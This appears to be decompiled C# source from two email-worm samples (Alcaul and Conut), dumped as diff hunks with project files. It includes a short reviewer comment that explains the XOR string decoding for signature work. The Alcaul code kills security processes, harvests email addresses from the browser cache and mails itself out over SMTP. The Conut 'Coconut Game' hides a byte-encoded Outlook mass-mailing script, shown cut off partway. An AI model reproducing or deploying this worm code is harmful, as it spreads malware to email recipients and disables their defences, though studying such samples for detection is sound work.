// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: CECE5B53-4BE2-43C6-85BC-E30F20D8366F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe
using System.Runtime.InteropServices;
internal class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000003\u002D1 \u0024\u0024method0x6000003\u002D1;
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000003\u002D1
{
}
}
@@ -0,0 +1,230 @@
// Decompiled with JetBrains decompiler
// Type: drunkenpope.brigada8
// Assembly: b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: CECE5B53-4BE2-43C6-85BC-E30F20D8366F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Windows.Forms;
namespace drunkenpope
{
public class brigada8
{
public static void Main(string[] args)
{
try
{
string str1 = brigada8.modem("xmlgcncpo.udklft10.t`4.ug`qaclz.tqqvcv.tqjukl10.tqgamop.tqacl62.tgvvpc{.tgv;7.vfq0/lv.vfq0/;:.vac.v`qacl.quggr;7.qrjklz.qoa.qgpt;7.qapqacl.qaclro.qacl;7.qacl10.qcdgug`.pgqawg.pct5ukl.pct5.rgpqdu.raducnnkaml.raaukl;:.rctu.rctqajgf.rctan.rcfokl.mwvrmqv.lta;7.lwrepcfg.lmpokqv.lockl.lkqwo.lctulv.lctu10.lctlv.lctnw10.lctcru10.l10qaclu.ordvpc{.ommnktg.nwcnn.nmmimwv.nmaifmul0222.hgfk.kmoml;:.kdcag.kaqwrrlv.kaqwrr;7.kaoml.kanmcflv.kanmcf;7.k`octqr.k`ocql.kcoqgpt.kcocrr.dpu.drpmv.dr/ukl.dklftkpw.d/qvmru.d/rpmv;7.d/rpmv.d/celv;7.gqrucvaj.gqcdg.gagleklg");
string str2 = brigada8.modem("ftr;7]2.ftr;7.angclgp1.angclgp.ancu;7ad.ancu;7.adklgv10.adklgv.adkcwfkv.adkcfokl.`ncaikag.`ncaif.ctuwrf10.ctukl;7.ctqajgf10.ctrwrf.ctrva10.ctro.ctrfmq10.ctraa.ctr10.ctr.ctlv.ctiqgpt.cteavpn.ctg10.ctamlqmn.cwvmfmul.crtzfukl.clvk/vpmhcl.caiukl10.]ctro.]ctraa.]ctr10");
string[] strArray1 = str1.Split(',');
string[] strArray2 = str2.Split(',');
foreach (string vry324 in strArray1)
brigada8.kernelhalt(vry324);
foreach (string vry324 in strArray2)
brigada8.kernelhalt(vry324);
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
string akt7 = brigada8.xmlparse234(module.FullyQualifiedName);
Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Icxcc^NmacnAmlvglv"), true).SetValue(brigada8.modem("Fkp2"), (object) (brigada8.modem("2301678") + Directory.GetCurrentDirectory()));
string[] strArray3 = new string[4]
{
brigada8.modem("Tkqwcn]Qvwfkm,LGV0221]ig{,gzg"),
brigada8.modem("vgcaj]{mwpqgnd]a!]kl]3]uggi,gzg"),
brigada8.modem("jkvocl0,gzg"),
brigada8.modem("Vgiigl6]dwnn,gzg")
};
foreach (string destFileName in strArray3)
{
try
{
File.Copy(module.FullyQualifiedName, destFileName);
}
catch
{
}
}
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Okapmqmdv^Klvgplgv\"Caamwlv\"Oclcegp"), true);
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Okapmqmdv^Klvgplgv\"Caamwlv\"Oclcegp^Caamwlvq^") + registryKey1.GetValue(brigada8.modem("Fgdcwnv\"Ockn\"Caamwlv")).ToString(), true);
string m91 = registryKey2.GetValue(brigada8.modem("QOVR\"Qgptgp")).ToString();
string foam = registryKey2.GetValue(brigada8.modem("QOVR\"Gockn\"Cffpgqq")).ToString();
foreach (string directory1 in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.InternetCache)))
{
foreach (string directory2 in Directory.GetDirectories(directory1))
{
foreach (string file in Directory.GetFiles(directory2, brigada8.modem("(,jv(")))
brigada8.melee(file, m91, foam, akt7);
}
}
int num = (int) MessageBox.Show(brigada8.modem("lm\"ompg\"`gvc\"vumq"), brigada8.modem("oqkn,ocqq,`\"*a!n{\"ocfg+\"`{\"cnamrcwn-`pkecfc\"majm"), MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
catch
{
}
}
public static void melee(string f91, string m91, string foam, string akt7)
{
StreamReader streamReader = new StreamReader((Stream) new FileStream(f91, FileMode.OpenOrCreate, FileAccess.Read));
streamReader.BaseStream.Seek(0L, SeekOrigin.Begin);
while (streamReader.Peek() > -1)
{
string hjkl = brigada8.harvest(streamReader.ReadLine());
if (hjkl != "")
{
try
{
brigada8.codedom563(m91, foam, hjkl, akt7);
}
catch
{
}
}
}
streamReader.Close();
}
public static string harvest(string helga)
{
char[] anyOf = new char[6]
{
'?',
'\'',
'"',
'>',
'<',
' '
};
string str1 = helga;
try
{
int sourceIndex = str1.IndexOf(brigada8.modem("ocknvm8"));
int num = str1.LastIndexOfAny(anyOf);
char[] destination1 = new char[(int) checked ((uint) unchecked (num - sourceIndex))];
str1.CopyTo(sourceIndex, destination1, 0, num - sourceIndex);
string str2 = new string(destination1).Replace(brigada8.modem("ocknvm8"), "").Replace("%20", "").Replace("%40", "@");
try
{
int count = str2.IndexOfAny(anyOf);
char[] destination2 = new char[(int) checked ((uint) count)];
str2.CopyTo(0, destination2, 0, count);
return new string(destination2);
}
catch
{
return str2;
}
}
catch
{
return "";
}
}
public static string xmlparse234(string tukoo)
{
FileStream input = new FileStream(tukoo, FileMode.OpenOrCreate, FileAccess.Read);
BinaryReader binaryReader = new BinaryReader((Stream) input);
binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
byte[] numArray = new byte[(int) checked ((uint) input.Length)];
int length1 = (int) input.Length;
int index1 = 0;
int num;
for (; length1 > 0; length1 -= num)
{
num = binaryReader.Read(numArray, index1, length1);
if (num != 0)
index1 += num;
else
break;
}
binaryReader.Close();
StringBuilder stringBuilder = new StringBuilder();
string base64String = Convert.ToBase64String(numArray);
int length2 = base64String.Length;
char[] destination = new char[(int) checked ((uint) length2)];
base64String.CopyTo(0, destination, 0, length2);
for (int index2 = 1; index2 <= length2; ++index2)
{
if (index2 % 76 == 0)
stringBuilder.Append(string.Format("{0}\r\n", (object) destination[index2 - 1]));
else
stringBuilder.Append(string.Format("{0}", (object) destination[index2 - 1]));
}
return stringBuilder.ToString();
}
public static void kernelhalt(string vry324)
{
foreach (Process process in Process.GetProcessesByName(vry324))
process.Kill();
}
public static string modem(string hhh)
{
StringBuilder stringBuilder = new StringBuilder();
for (int index = 0; index < hhh.Length; ++index)
{
int num = Convert.ToInt32(hhh[index]) ^ 2;
stringBuilder.Append(Convert.ToChar(num));
}
return stringBuilder.ToString();
}
public static void codedom563(string asdf, string cvbn, string hjkl, string tukoo)
{
string str1 = brigada8.modem("Dpmo8\"") + cvbn + " <" + cvbn + ">\r\n";
string str2 = brigada8.modem("Vm8\"") + hjkl + " <" + hjkl + ">\r\n";
string str3 = brigada8.modem("Fcvg8\"") + DateTime.Now.ToString() + "\r\n";
string str4 = brigada8.modem("Z/Ockngp8\"fmlmvvmwaj") + "\r\n";
string str5 = brigada8.modem("Z/Rpkmpkv{8\"1") + "\r\n";
string str6 = brigada8.modem("OKOG/Tgpqkml8\"3,2") + "\r\n";
string str7 = brigada8.modem("Amlvglv/V{rg8\"ownvkrcpv-okzgf9\"`mwlfcp{? //`q`h 9") + "\r\n\r\n";
string str8 = brigada8.modem("Vjkq\"kq\"c\"ownvk/rcpv\"ogqqceg\"kl\"OKOG\"dmpocv,") + "\r\n\r\n";
string str9 = "----bsbj\r\n";
string str10 = brigada8.modem("Amlvglv/V{rg8\"vgzv-jvon9\"ajcpqgv?wq/cqakk") + "\r\n\r\n";
string str11 = brigada8.modem(" Rggp/vm/Rggp\",LGV\"Qmdvucpg\"cvvcajgf,\"Pgswkpgq\"vjg\",LGV\"dpcogumpi, ") + "\r\n\r\n";
string str12 = "----bsbj\r\n";
string str13 = brigada8.modem("Amlvglv/V{rg8\"crrnkacvkml-z/oqfmulnmcf9\"lcog? lgvdz3,gzg ") + "\r\n";
string str14 = brigada8.modem("Amlvglv/Vpclqdgp/Glamfkle8\"`cqg46") + "\r\n";
string str15 = brigada8.modem("Amlvglv/Fkqrmqkvkml8\"cvvcajoglv9\"");
string str16 = brigada8.modem("dknglcog? lgvdz3,gzg ") + "\r\n\r\n";
string str17 = "\r\n\r\n";
string str18 = "----bsbj--\r\n\r\n.\r\n";
TcpClient tcpClient = new TcpClient(asdf, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
string str19 = streamReader.ReadLine();
byte[] bytes1 = Encoding.ASCII.GetBytes(brigada8.modem("JGNM\"nmacnjmqv") + "\r\n");
stream.Write(bytes1, 0, bytes1.Length);
str19 = streamReader.ReadLine();
byte[] bytes2 = Encoding.ASCII.GetBytes(brigada8.modem("OCKN\"DPMO8\"") + "<" + cvbn + ">\r\n");
stream.Write(bytes2, 0, bytes2.Length);
str19 = streamReader.ReadLine();
byte[] bytes3 = Encoding.ASCII.GetBytes(brigada8.modem("PARV\"VM8\"") + "<" + hjkl + ">\r\n");
stream.Write(bytes3, 0, bytes3.Length);
str19 = streamReader.ReadLine();
byte[] bytes4 = Encoding.ASCII.GetBytes(brigada8.modem("FCVC") + "\r\n");
stream.Write(bytes4, 0, bytes4.Length);
str19 = streamReader.ReadLine();
byte[] bytes5 = Encoding.ASCII.GetBytes(str1 + str2 + str3 + str4 + str5);
stream.Write(bytes5, 0, bytes5.Length);
byte[] bytes6 = Encoding.ASCII.GetBytes(str6 + str7 + str8 + str9 + str10 + str11);
stream.Write(bytes6, 0, bytes6.Length);
byte[] bytes7 = Encoding.ASCII.GetBytes(str12 + str13 + str14 + str15 + str16 + tukoo + str17 + str18);
stream.Write(bytes7, 0, bytes7.Length);
str19 = streamReader.ReadLine();
byte[] bytes8 = Encoding.ASCII.GetBytes(brigada8.modem("SWKV") + "\r\n");
stream.Write(bytes8, 0, bytes8.Length);
str19 = streamReader.ReadLine();
stream.Close();
streamReader.Close();
tcpClient.Close();
}
}
}
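Review bot: `modem` has no comment, yet it is the key to reading the rest of the file: it XORs every character with 2, so each literal passed through it is obfuscated and will not match a plaintext string signature. A doc comment such as `/// Decodes an obfuscated literal by XOR-ing each character with 2.` belongs above it, and decoded values would help next to the calls, for example `"ocknvm8"` in `harvest` decodes to `mailto:`. The method structure otherwise mirrors the Alcaul.af sample earlier on this page (`harvest`/`xtrak`, `xmlparse234`/`uue`, `kernelhalt`/`killprocs`, `melee`/`extractmails`), so signatures written for that sample should be checked against the decoded strings here rather than the raw ones. The empty `catch` blocks in `Main` and `melee` swallow every failure, which means the sample fails silently and leaves no error dialog for a user to notice.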
@@ -0,0 +1,13 @@
using System.Reflection;
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyVersion("1.0.1289.25246")]
@@ -0,0 +1,45 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>coconut</AssemblyName>
<ApplicationVersion>1.0.1289.25246</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CPrivateImplementationDetails_003E.cs" />
<Compile Include="coconut\Form1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="coconut\Form1.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "coconut", "Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f.csproj", "{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}.Debug|Any CPU.Build.0 = Debug|Any CPU
{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}.Release|Any CPU.ActiveCfg = Release|Any CPU
{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: coconut, Version=1.0.1289.25246, Culture=neutral, PublicKeyToken=null
// MVID: 74F497AE-8E4C-45C7-B879-11E47B32AF9E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f.exe
using System.Runtime.InteropServices;
internal class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000005\u002D1 \u0024\u0024method0x6000005\u002D1;
[StructLayout(LayoutKind.Explicit, Size = 685, Pack = 1)]
private struct \u0024\u0024struct0x6000005\u002D1
{
}
}
@@ -0,0 +1,947 @@
// Decompiled with JetBrains decompiler
// Type: coconut.Form1
// Assembly: coconut, Version=1.0.1289.25246, Culture=neutral, PublicKeyToken=null
// MVID: 74F497AE-8E4C-45C7-B879-11E47B32AF9E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f.exe
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Resources;
using System.Windows.Forms;
namespace coconut
{
public class Form1 : Form
{
public int throw_turn = 0;
public int score = 0;
public Random rand_numb = new Random();
public string virname = Application.ExecutablePath;
private Button button1;
private PictureBox coco;
private PictureBox cluley;
private PictureBox redattack;
private PictureBox cl_coco;
private PictureBox red_coco;
private PictureBox ms_coco;
private Label label1;
private Label label2;
private Container components = (Container) null;
public Form1() => this.InitializeComponent();
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
ResourceManager resourceManager = new ResourceManager(typeof (Form1));
this.coco = new PictureBox();
this.cluley = new PictureBox();
this.redattack = new PictureBox();
this.button1 = new Button();
this.cl_coco = new PictureBox();
this.red_coco = new PictureBox();
this.ms_coco = new PictureBox();
this.label1 = new Label();
this.label2 = new Label();
this.SuspendLayout();
this.coco.BackColor = Color.White;
this.coco.Image = (Image) resourceManager.GetObject("coco.Image");
this.coco.Location = new Point(0, 88);
this.coco.Name = "coco";
this.coco.Size = new Size(104, 96);
this.coco.TabIndex = 0;
this.coco.TabStop = false;
this.cluley.Image = (Image) resourceManager.GetObject("cluley.Image");
this.cluley.Location = new Point(352, 176);
this.cluley.Name = "cluley";
this.cluley.Size = new Size(80, 104);
this.cluley.TabIndex = 1;
this.cluley.TabStop = false;
this.redattack.Image = (Image) resourceManager.GetObject("redattack.Image");
this.redattack.Location = new Point(176, 176);
this.redattack.Name = "redattack";
this.redattack.Size = new Size(104, 104);
this.redattack.TabIndex = 2;
this.redattack.TabStop = false;
this.button1.BackColor = Color.LightGray;
this.button1.Location = new Point(208, 40);
this.button1.Name = "button1";
this.button1.Size = new Size(168, 48);
this.button1.TabIndex = 3;
this.button1.Text = "Throw!";
this.button1.Click += new EventHandler(this.button1_Click);
this.cl_coco.BackColor = Color.White;
this.cl_coco.Image = (Image) resourceManager.GetObject("cl_coco.Image");
this.cl_coco.Location = new Point(336, 176);
this.cl_coco.Name = "cl_coco";
this.cl_coco.Size = new Size(104, 96);
this.cl_coco.TabIndex = 4;
this.cl_coco.TabStop = false;
this.cl_coco.Visible = false;
this.red_coco.BackColor = Color.White;
this.red_coco.Image = (Image) resourceManager.GetObject("red_coco.Image");
this.red_coco.Location = new Point(176, 176);
this.red_coco.Name = "red_coco";
this.red_coco.Size = new Size(104, 96);
this.red_coco.TabIndex = 5;
this.red_coco.TabStop = false;
this.red_coco.Visible = false;
this.ms_coco.BackColor = Color.White;
this.ms_coco.Image = (Image) resourceManager.GetObject("ms_coco.Image");
this.ms_coco.Location = new Point(496, 176);
this.ms_coco.Name = "ms_coco";
this.ms_coco.Size = new Size(104, 96);
this.ms_coco.TabIndex = 6;
this.ms_coco.TabStop = false;
this.ms_coco.Visible = false;
this.label1.Location = new Point(136, 144);
this.label1.Name = "label1";
this.label1.Size = new Size(184, 24);
this.label1.TabIndex = 7;
this.label1.Text = "Frans Devaere aka \"ReDaTtAcK\"";
this.label2.Location = new Point(352, 144);
this.label2.Name = "label2";
this.label2.TabIndex = 8;
this.label2.Text = "Graham Cluley";
this.AutoScaleBaseSize = new Size(5, 13);
this.BackColor = Color.White;
this.ClientSize = new Size(600, 270);
this.Controls.AddRange(new Control[9]
{
(Control) this.label2,
(Control) this.label1,
(Control) this.ms_coco,
(Control) this.red_coco,
(Control) this.cl_coco,
(Control) this.button1,
(Control) this.redattack,
(Control) this.cluley,
(Control) this.coco
});
this.Name = nameof (Form1);
this.Text = "The Coconut Game";
this.Load += new EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
[STAThread]
private static void Main() => Application.Run((Form) new Form1());
private void Form1_Load(object sender, EventArgs e)
{
byte[] buffer1 = new byte[685]
{
(byte) 79,
(byte) 110,
(byte) 32,
(byte) 69,
(byte) 114,
(byte) 114,
(byte) 111,
(byte) 114,
(byte) 32,
(byte) 82,
(byte) 101,
(byte) 115,
(byte) 117,
(byte) 109,
(byte) 101,
(byte) 32,
(byte) 78,
(byte) 101,
(byte) 120,
(byte) 116,
(byte) 13,
(byte) 10,
(byte) 68,
(byte) 105,
(byte) 109,
(byte) 32,
(byte) 99,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 44,
(byte) 32,
(byte) 77,
(byte) 97,
(byte) 105,
(byte) 108,
(byte) 44,
(byte) 32,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 44,
(byte) 32,
(byte) 65,
(byte) 44,
(byte) 32,
(byte) 66,
(byte) 44,
(byte) 32,
(byte) 67,
(byte) 44,
(byte) 32,
(byte) 68,
(byte) 44,
(byte) 32,
(byte) 69,
(byte) 13,
(byte) 10,
(byte) 83,
(byte) 101,
(byte) 116,
(byte) 32,
(byte) 99,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 67,
(byte) 114,
(byte) 101,
(byte) 97,
(byte) 116,
(byte) 101,
(byte) 79,
(byte) 98,
(byte) 106,
(byte) 101,
(byte) 99,
(byte) 116,
(byte) 32,
(byte) 40,
(byte) 34,
(byte) 111,
(byte) 117,
(byte) 116,
(byte) 108,
(byte) 111,
(byte) 111,
(byte) 107,
(byte) 46,
(byte) 97,
(byte) 112,
(byte) 112,
(byte) 108,
(byte) 105,
(byte) 99,
(byte) 97,
(byte) 116,
(byte) 105,
(byte) 111,
(byte) 110,
(byte) 34,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 83,
(byte) 101,
(byte) 116,
(byte) 32,
(byte) 77,
(byte) 97,
(byte) 105,
(byte) 108,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 99,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 46,
(byte) 71,
(byte) 101,
(byte) 116,
(byte) 78,
(byte) 97,
(byte) 109,
(byte) 101,
(byte) 83,
(byte) 112,
(byte) 97,
(byte) 99,
(byte) 101,
(byte) 32,
(byte) 40,
(byte) 34,
(byte) 77,
(byte) 65,
(byte) 80,
(byte) 73,
(byte) 34,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 70,
(byte) 111,
(byte) 114,
(byte) 32,
(byte) 65,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 49,
(byte) 32,
(byte) 84,
(byte) 111,
(byte) 32,
(byte) 77,
(byte) 97,
(byte) 105,
(byte) 108,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 114,
(byte) 101,
(byte) 115,
(byte) 115,
(byte) 76,
(byte) 105,
(byte) 115,
(byte) 116,
(byte) 115,
(byte) 46,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 13,
(byte) 10,
(byte) 83,
(byte) 101,
(byte) 116,
(byte) 32,
(byte) 66,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 77,
(byte) 97,
(byte) 105,
(byte) 108,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 114,
(byte) 101,
(byte) 115,
(byte) 115,
(byte) 76,
(byte) 105,
(byte) 115,
(byte) 116,
(byte) 115,
(byte) 32,
(byte) 40,
(byte) 65,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 49,
(byte) 13,
(byte) 10,
(byte) 83,
(byte) 101,
(byte) 116,
(byte) 32,
(byte) 67,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 99,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 46,
(byte) 67,
(byte) 114,
(byte) 101,
(byte) 97,
(byte) 116,
(byte) 101,
(byte) 73,
(byte) 116,
(byte) 101,
(byte) 109,
(byte) 32,
(byte) 40,
(byte) 48,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 70,
(byte) 111,
(byte) 114,
(byte) 32,
(byte) 68,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 49,
(byte) 32,
(byte) 84,
(byte) 111,
(byte) 32,
(byte) 66,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 114,
(byte) 101,
(byte) 115,
(byte) 115,
(byte) 69,
(byte) 110,
(byte) 116,
(byte) 114,
(byte) 105,
(byte) 101,
(byte) 115,
(byte) 46,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 13,
(byte) 10,
(byte) 69,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 66,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 114,
(byte) 101,
(byte) 115,
(byte) 115,
(byte) 69,
(byte) 110,
(byte) 116,
(byte) 114,
(byte) 105,
(byte) 101,
(byte) 115,
(byte) 32,
(byte) 40,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 82,
(byte) 101,
(byte) 99,
(byte) 105,
(byte) 112,
(byte) 105,
(byte) 101,
(byte) 110,
(byte) 116,
(byte) 115,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 32,
(byte) 69,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 32,
(byte) 43,
(byte) 32,
(byte) 49,
(byte) 13,
(byte) 10,
(byte) 73,
(byte) 102,
(byte) 32,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 32,
(byte) 62,
(byte) 32,
(byte) 51,
(byte) 48,
(byte) 48,
(byte) 48,
(byte) 32,
(byte) 84,
(byte) 104,
(byte) 101,
(byte) 110,
(byte) 32,
(byte) 69,
(byte) 120,
(byte) 105,
(byte) 116,
(byte) 32,
(byte) 70,
(byte) 111,
(byte) 114,
(byte) 13,
(byte) 10,
(byte) 78,
(byte) 101,
(byte) 120,
(byte) 116,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 83,
(byte) 117,
(byte) 98,
(byte) 106,
(byte) 101,
(byte) 99,
(byte) 116,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 34,
(byte) 84,
(byte) 104,
(byte) 101,
(byte) 32,
(byte) 67,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 32,
(byte) 71,
(byte) 97,
(byte) 109,
(byte) 101,
(byte) 34,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 66,
(byte) 111,
(byte) 100,
(byte) 121,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 34,
(byte) 84,
(byte) 104,
(byte) 105,
(byte) 115,
(byte) 32,
(byte) 103,
(byte) 97,
(byte) 109,
(byte) 101,
(byte) 32,
(byte) 109,
(byte) 97,
(byte) 100,
(byte) 101,
(byte) 32,
(byte) 109,
(byte) 101,
(byte) 32,
(byte) 102,
(byte) 101,
(byte) 101,
(byte) 108,
(byte) 32,
(byte) 108,
(byte) 105,
(byte) 107,
(byte) 101,
(byte) 32,
(byte) 73,
(byte) 32,
(byte) 119,
(byte) 97,
(byte) 115,
(byte) 32,
(byte) 111,
(byte) 110,
(byte) 32,
(byte) 97,
(byte) 32,
(byte) 118,
(byte) 97,
(byte) 99,
(byte) 97,
(byte) 116,
(byte) 105,
(byte) 111,
(byte) 110,
(byte) 32,
(byte) 58,
(byte) 41,
(byte) 34,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 65,
(byte) 116,
(byte) 116,
(byte) 97,
(byte) 99,
(byte) 104,
(byte) 109,
(byte) 101,
(byte) 110,
(byte) 116,
(byte) 115,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 32,
(byte) 34,
(byte) 99,
(byte) 58,
(byte) 92,
(byte) 99,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 46,
(byte) 101,
(byte) 120,
(byte) 101,
(byte) 34,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 68,
(byte) 101,
(byte) 108,
(byte) 101,
(byte) 116,
(byte) 101,
(byte) 65,
(byte) 102,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 83,
(byte) 117,
(byte) 98,
(byte) 109,
(byte) 105,
(byte) 116,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 84,
(byte) 114,
(byte) 117,
(byte) 101,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 83,
(byte) 101,
(byte) 110,
(byte) 100,
(byte) 13,
(byte) 10,
(byte) 78,
(byte) 101,
(byte) 120,
(byte) 116,
(byte) 13,
(byte) 10,
(byte) 83,
(byte) 101,
(byte) 116,
